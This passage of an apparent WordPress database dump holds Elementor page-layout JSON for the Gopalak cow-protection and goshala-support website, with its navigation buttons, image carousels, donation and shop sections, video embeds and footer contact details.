":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12272,2013,'_elementor_page_assets','a:0:{}'),(12274,2014,'_elementor_edit_mode','builder'),(12275,2014,'_elementor_template_type','wp-page'),(12276,2014,'_elementor_version','3.7.8'),(12277,2014,'_wp_page_template','elementor_canvas'),(12278,2014,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 